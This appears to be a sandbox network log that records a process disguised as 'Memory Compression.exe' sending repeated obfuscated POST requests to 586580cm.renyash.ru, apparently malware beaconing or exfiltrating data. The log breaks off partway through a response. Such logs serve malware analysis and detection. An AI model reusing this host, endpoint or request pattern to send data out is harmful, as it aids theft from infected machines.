                                                                                                                                Jan 11, 2025 15:03:46.320242882 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:46 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YEAxux2JkpZyaQk7wKTk17wmZekYQZwHtDg0qZ%2BYXmVDp7WbgTvk4kPzpXGN5uhwy4lNWC2o%2Bymv9IL1egA4De%2BDKKzdwfeuHoPKukR5fVjaJsLjsYm1NN0XcmPJxr2f8qIzLeqD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573bcad9d437b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4997&min_rtt=1991&rtt_var=6760&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=56056&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                95192.168.2.550077104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:46.441606045 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:46.798876047 CET1060OUTData Raw: 5a 50 5d 5e 5f 5f 58 51 5c 5f 50 57 54 57 59 5c 59 54 5b 5b 57 5f 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZP]^__XQ\_PWTWY\YT[[W_TZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&V7?T(#2>0X=)&>+#9$<#X"Q(*+.^''P*-
                                                                                                                                Jan 11, 2025 15:03:47.042541027 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:47.067533016 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c3wE6jT5w%2Fy2cMVhrrsAbvYSTt9RizWPjC01heAoQSmcsUVfEKBwcW87UKFjLWPG3KKVNZbsS08yKgU0IVTR%2FtCjkviobkdvQN0zipmcsa5xtuXUqxYr%2FY8oGqGODzAut4cj%2BKrQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573c1ef3b435e-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3961&min_rtt=1616&rtt_var=5296&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=71642&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                96192.168.2.550078104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:47.244805098 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:47.595616102 CET1056OUTData Raw: 5f 5f 5d 5d 5f 53 58 56 5c 5f 50 57 54 55 59 5f 59 5c 5b 58 57 54 54 50 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __]]_SXV\_PWTUY_Y\[XWTTP[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2 ,\(<Z#6[3&4\*)"=7>W'?2V+$"7#S*+.^''P*5
                                                                                                                                Jan 11, 2025 15:03:47.697659969 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:47.934931993 CET799INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rkooofYVIdYuAecTaVgSvd%2FWnv4VTo6KFumaQidIjMaEEEscPDvEGY%2F42oAieZ6mxDsQFtEFvavaxyK5lPFmBsM5T5hCOAZBKuZSMWUGxfM6C7IDws4DGJiZ7hmqSDVAjIaiUGL8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573c6de8dde9a-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3938&min_rtt=1510&rtt_var=5423&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1366&delivery_rate=69729&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                97192.168.2.550079104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:48.125848055 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:48.475078106 CET1060OUTData Raw: 5f 50 5d 5f 5f 5e 5d 50 5c 5f 50 57 54 53 59 53 59 56 5b 5b 57 5e 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _P]__^]P\_PWTSYSYV[[W^TY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"% 7?T$ !3%4X?:5=8;79"W0.R<Z!Q#V);.^''P*=
                                                                                                                                Jan 11, 2025 15:03:48.572727919 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:48.816670895 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:48 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QQDiGr%2BodQKaS3json62d7OE0HLrbuVvtTK6oxteeLCA6ovVvS530ncmvFrSUAPwPF72u5KrbR%2BQCtB%2BATsdNsZPfXVtcD7Dkw%2BK4pCUB9a9YhceiIESten0X4RKG19nXRBu1Z4Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573cc5ae70c7c-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4146&min_rtt=1573&rtt_var=5737&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=65881&cwnd=75&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                98192.168.2.550080104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:48.946400881 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:49.298757076 CET1060OUTData Raw: 5f 5f 58 5e 5a 58 58 50 5c 5f 50 57 54 5c 59 5b 59 5c 5b 5b 57 52 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __X^ZXXP\_PWT\Y[Y\[[WRT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_%0+?7#!9$%,\=)1_*4*50/.+5'Y6#V).^''P*
                                                                                                                                Jan 11, 2025 15:03:49.390239954 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                99192.168.2.550081104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:49.449347973 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1756
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:49.800026894 CET1756OUTData Raw: 5f 54 5d 5e 5a 5c 58 54 5c 5f 50 57 54 5d 59 5d 59 51 5b 50 57 57 54 51 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _T]^Z\XT\_PWT]Y]YQ[PWWTQ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!_'#+?!8_ Z'C$?:!=0Q :%%<9+8!$#*;.^''P*
                                                                                                                                Jan 11, 2025 15:03:49.895451069 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:50.073896885 CET980INHTTP/1.1 502 Bad Gateway
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:50 GMT
                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                Content-Length: 15
                                                                                                                                Connection: keep-alive
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSGnGkBdqZ92m2FYS3mndSKToED%2Be%2F5oPrFuTRRNOYukrOAYEr01LRFw%2FinpI5AI0PrL68ev9JU2FobcplOq5oO%2BUbQallMvNb1lVL4f5Aau3cP8WGimHOqdf1RrX4%2F5JR9KrHur"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573d49f4a0c7e-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2856&min_rtt=1675&rtt_var=2991&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2066&delivery_rate=131224&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32
                                                                                                                                Data Ascii: error code: 502
                                                                                                                                Jan 11, 2025 15:03:50.294647932 CET980INHTTP/1.1 502 Bad Gateway
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:50 GMT
                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                Content-Length: 15
                                                                                                                                Connection: keep-alive
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSGnGkBdqZ92m2FYS3mndSKToED%2Be%2F5oPrFuTRRNOYukrOAYEr01LRFw%2FinpI5AI0PrL68ev9JU2FobcplOq5oO%2BUbQallMvNb1lVL4f5Aau3cP8WGimHOqdf1RrX4%2F5JR9KrHur"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573d49f4a0c7e-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2856&min_rtt=1675&rtt_var=2991&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2066&delivery_rate=131224&cwnd=76&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 30 32
                                                                                                                                Data Ascii: error code: 502


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                100192.168.2.550082104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:49.873517036 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:50.220552921 CET1060OUTData Raw: 5f 55 58 5a 5f 53 58 55 5c 5f 50 57 54 50 59 5b 59 54 5b 5b 57 50 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _UXZ_SXU\_PWTPY[YT[[WPT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2,\?"71&^$68^>&+(,Q *&U$.(/[5$;S).^''P*1
                                                                                                                                Jan 11, 2025 15:03:50.318742037 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:50.562257051 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:50 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=877RWyTKn4JrhTwvXMJfdHoR0T703x25K4IbLDoRqfXPqqxUmTjS%2B5K1%2BwKILNO1tUj70CCYEcrawzbaKVM8I3%2FN5Pftl%2FeRYEL5GBWq8IPmwZ%2F6bvlS1k7kt0oDbx8xiThFMXXQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573d7397a7d0b-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4888&min_rtt=1960&rtt_var=6591&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=57516&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                101192.168.2.550083104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:50.701843023 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1056
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:51.048985958 CET1056OUTData Raw: 5f 5f 5d 5a 5f 58 58 54 5c 5f 50 57 54 55 59 52 59 51 5b 5b 57 55 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __]Z_XXT\_PWTUYRYQ[[WUTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!&07(T' 2!'&;>&>8$ 9V'!*6/Z67R(;.^''P*
                                                                                                                                Jan 11, 2025 15:03:51.168956995 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:51.338324070 CET807INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:51 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gwxYrMga8j0jxBnEdRsOPtd%2Fatm2WI%2F8RAc6IK8cN7Zp9p3zICruYuH5M3qbu9RXj4fCfwmkTBFzbSI9pmK3sNTcHmm%2FxvVtG4VoxkDi0Mrjs4f59Wn3YRvb6ffPZ%2F%2BoYo8u%2B4uR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573dc8e95c3ff-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4125&min_rtt=1482&rtt_var=5842&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1342&delivery_rate=64521&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                102192.168.2.550084104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:51.457621098 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:51.814399958 CET1060OUTData Raw: 5a 50 5d 5b 5f 5a 5d 54 5c 5f 50 57 54 54 59 5f 59 5c 5b 58 57 53 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZP][_Z]T\_PWTTY_Y\[XWST][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2/(<[46_$,_>)># 9*T$+;[ $4);.^''P*!
                                                                                                                                Jan 11, 2025 15:03:51.905467987 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:52.072499990 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:52 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gzZq8veV1NsqYUqS1XKphZyHmQpPgKCSDKzlmHEbvwg7d6R6jRZ4A01G5eo9OqknTja8JdEIqMAPaCuOMHGGJk0L%2BGpNRhto1zmgWww6DCyBcFctZRyl1%2B7kcvXeidMdnQtD2jyB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573e12be77ca5-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2115&min_rtt=1890&rtt_var=1159&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=395235&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                103192.168.2.550085104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:52.462387085 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:52.814336061 CET1060OUTData Raw: 5f 51 5d 59 5a 5e 58 55 5c 5f 50 57 54 5d 59 58 59 5c 5b 5b 57 52 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q]YZ^XU\_PWT]YXY\[[WRT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"%30Y+"?#6Z$6+*:5+(; V%/(6?67/=+.^''P*
                                                                                                                                Jan 11, 2025 15:03:52.922040939 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:53.186444044 CET800INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
